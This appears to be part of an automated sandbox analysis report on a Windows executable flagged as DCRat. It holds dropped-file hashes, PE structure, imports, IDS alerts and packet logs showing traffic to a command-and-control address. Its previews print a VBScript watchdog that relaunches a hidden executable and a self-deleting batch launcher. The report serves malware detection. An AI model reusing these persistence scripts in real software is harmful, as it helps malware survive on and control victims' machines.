Encrypted:	false
SSDEEP:	12:9vWdDIyRfhMAyjMpVj5wJ9Efbf1NueGo0BMhFiXAp4QCk3:9A3fCAyj+fbf1NhcMDYAp4QCw
MD5:	EF1D237CF014DFDED69F10C11F46D5A8
SHA1:	05061D2EF55B1979A23B134F1CC8D5BECC6F5701
SHA-256:	E6E23EF6B5424C75AAA65510959A26F77FD7C7D948A2091F906638F5B081C2FC
SHA-512:	6E08A722AD4463E89593BAAA3EECF19DAB03F65D01139B0162061F083D41B825EC0522C4D8D387B37AA5D34E9AD3E302BED2565B3F8D408E9C55BC53C2B45FF5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\3eb93d73da02516de53e5ed168763ffb45d30163.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

C:\Users\user\AppData\Local\Temp\foJjr7Samq

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\pKcy9gRiRF

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\sSMyRm55ZX.bat

Download File

Process:	C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	187
Entropy (8bit):	5.031925371713696
Encrypted:	false
SSDEEP:	3:mKDDBEIFK+KdTVpM3No+HK9ATScyW+jn9m7YN9SBktKcKZG1t+kiE2J5xAIHvQxK:hITg3Nou11r+DE7g8KOZG1wkn23fHIxK
MD5:	B62AAF519E3D493B02B551781FDE1BFD
SHA1:	B3359C94C29475EC42D185757398DF4440C84779
SHA-256:	6800E43E362BAE3EFCCCFD00616407EB7C63CCD58BA65D3400ED497A0DD37429
SHA-512:	73AD73F9962E5A8FEB9093911027BAA5A44DC6CE3A6CC1801CEC93AAE8170CEA3BBA203FC0788E1AEEF40871CDB557A48BF57A11EA77D18A6D12282D72900C8D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Recovery\sihost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\sSMyRm55ZX.bat"

C:\Users\user\AppData\Local\Temp\zpnzDfmWeK

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.826929187953332
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXIFNvoa6YKvj:Vx993DEUWa6x
MD5:	519FEC707A12748A553C228BE0FE26CF
SHA1:	53950901A4C62B8B8A3A26C219470CD41B1DDF66
SHA-256:	DE1D257EB69F36B3AE9BCDE93B1F17F0E333DA9A00BBB49B72E4EEF2567FB967
SHA-512:	2DB2D0951597BCC03799899D84D01481C4C811077D845EB336F4C9E6C32F717E56CF27F0C68A76E8CAFC6CDC41AAC93D05923D45E8AAAD28F983B16A235677B9
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 28/12/2024 19:07:23..19:07:23, error: 0x80072746.19:07:28, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.026952405880229
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	hK8z1AmKO1.exe
File size:	1'624'759 bytes
MD5:	69479795019aa359d016e695415f1736
SHA1:	8198ac724602eaa37905f15edba150658fd8bf5a
SHA256:	3529cf36c8b41b4d5ef281bc32cd211152e573d6639dc15399ee69a4ff0c0fd9
SHA512:	d27937cb0078cb87ff4141c93f5c48037f66b306716da44311d45618d7dc0212dd38c64b44a8e4d78f366bd2828bbf93d6bb4382b0e1c1619f4e2580d2c151e4
SSDEEP:	24576:u2G/nvxW3WieCs6LbAfsHAXNZjR9VnaOuufyDczqJcvofblvkIiAPN4RzmKZ:ubA3jsqbAXXnF9hFgJcIiAQzma
TLSH:	AF758C017E85CA11F0192633C2FF450847B4AC116AA7E72B7EBA3B6D55123A37D1DACB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41ec40
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007FE3608E5A19h
jmp 00007FE3608E542Dh
cmp ecx, dword ptr [0043E668h]
jne 00007FE3608E55A5h
ret
jmp 00007FE3608E5B9Eh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FE3608D8337h
mov dword ptr [esi], 00435580h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00435588h
mov dword ptr [ecx], 00435580h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00435568h
push eax
call 00007FE3608E873Dh
pop ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FE3608D82CEh
push 0043B704h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FE3608E7E52h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FE3608E5544h
push 0043B91Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FE3608E7E35h
int3
jmp 00007FE3608E9E83h
jmp dword ptr [00433260h]
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00421EB0h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3c820	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c854	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x63000	0xdf98	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x71000	0x2268	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3aac0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x35508	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3bdc4	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x310ea	0x31200	c5bf61bbedb6ad471e9dc6266398e965	False	0.583959526081425	data	6.708075396341128	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xa612	0xa800	7980b588d5b28128a2f3c36cabe2ce98	False	0.45284598214285715	data	5.221742709250668	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x23728	0x1000	201530c9e56f172adf2473053298d48f	False	0.36767578125	data	3.7088186669877685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x62000	0x188	0x200	c5d41d8f254f69e567595ab94266cfdc	False	0.4453125	data	3.2982538067961342	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x63000	0xdf98	0xe000	d4fc32bf886ae704fea4f916f9d3a59d	False	0.637451171875	data	6.661378204564432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x71000	0x2268	0x2400	c7a942b723cb29d9c02f7c611b544b50	False	0.7681206597222222	data	6.5548620101740545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x63644	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x6418c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x65738	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x65ca0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x66548	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x673f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x67858	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x68900	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6aea8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x6ec1c	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x6eea4	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x6efe0	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x6f0cc	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6f1fc	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6f534	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x6f788	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x6f96c	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x6fb38	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x6fcf0	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x6fe38	0x446	data	English	United States	0.340036563071298
RT_STRING	0x70280	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x703e8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x7053c	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x70648	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x70704	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x707dc	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x70844	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.39786666666666665

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-29T00:07:08.224516+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.4	49730	185.114.245.123	80	TCP
2024-12-29T00:07:48.386545+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	185.114.245.123	80	192.168.2.4	49744	TCP
2024-12-29T00:08:53.761531+0100	2850862	ETPRO MALWARE DCRat Initial Checkin Server Response M4	1	185.114.245.123	80	192.168.2.4	49860	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 00:07:06.619699955 CET	49730	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:06.739295006 CET	80	49730	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:06.739397049 CET	49730	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:06.740266085 CET	49730	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:06.859884024 CET	80	49730	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:08.224422932 CET	80	49730	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:08.224447966 CET	80	49730	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:08.224515915 CET	49730	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:08.493328094 CET	49730	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:08.498240948 CET	49731	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:08.612871885 CET	80	49730	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:08.617794991 CET	80	49731	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:08.617872953 CET	49731	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:08.618202925 CET	49731	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:08.737683058 CET	80	49731	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:08.737797022 CET	80	49731	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:08.951164961 CET	80	49730	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:08.989958048 CET	49730	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:09.109708071 CET	80	49730	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:09.445563078 CET	80	49730	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:09.500178099 CET	49730	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:09.954200029 CET	80	49731	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:09.999808073 CET	49731	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:13.364986897 CET	49730	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:13.366091967 CET	49732	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:13.370683908 CET	49731	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:13.484877110 CET	80	49730	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:13.484935045 CET	49730	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:13.485594988 CET	80	49732	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:13.487963915 CET	49732	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:13.488161087 CET	49732	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:13.490534067 CET	80	49731	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:13.490586996 CET	49731	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:13.607799053 CET	80	49732	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:14.888475895 CET	80	49732	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:14.899445057 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:14.937700033 CET	49732	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:14.970279932 CET	49734	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.019030094 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.019109011 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.019774914 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.089786053 CET	80	49734	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.089884996 CET	49734	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.090100050 CET	49734	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.139249086 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.209697962 CET	80	49734	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.209711075 CET	80	49734	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.375592947 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.495203018 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.495214939 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.495265007 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.495273113 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.495316029 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.495317936 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.495347023 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.495368004 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.495392084 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.495449066 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.495472908 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.495497942 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.495524883 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.495553970 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.495564938 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.495599985 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.495615959 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.539330006 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.539382935 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.614820957 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.614876986 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.614931107 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.614948034 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.614958048 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.614974976 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.614984989 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.615031004 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.655972004 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.656122923 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.719837904 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.719919920 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.775764942 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.775835037 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:15.819942951 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.883738041 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:15.947760105 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:16.089528084 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:16.415445089 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:16.468945026 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:16.523910046 CET	80	49734	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:16.578363895 CET	49734	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:16.957220078 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:16.960397959 CET	49732	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:17.000209093 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:21.532270908 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:21.532355070 CET	49734	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:21.533025980 CET	49740	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:21.652132034 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:21.652208090 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:21.652540922 CET	80	49740	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:21.652560949 CET	80	49734	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:21.652625084 CET	49740	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:21.652640104 CET	49734	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:21.652832985 CET	49740	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:21.890851021 CET	49740	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:22.242403030 CET	80	49734	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:22.242491007 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:22.242501020 CET	80	49740	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:22.242563009 CET	49734	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:22.242594957 CET	80	49740	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:22.242604971 CET	80	49740	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:22.242649078 CET	49733	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:22.362174988 CET	80	49734	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:22.362209082 CET	80	49733	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:23.542907000 CET	80	49740	185.114.245.123	192.168.2.4
Dec 29, 2024 00:07:23.594007969 CET	49740	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:28.550602913 CET	49740	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:28.551371098 CET	49742	80	192.168.2.4	185.114.245.123
Dec 29, 2024 00:07:28.670887947 CET	80	49740	185.114.245.123	192.168.2.4
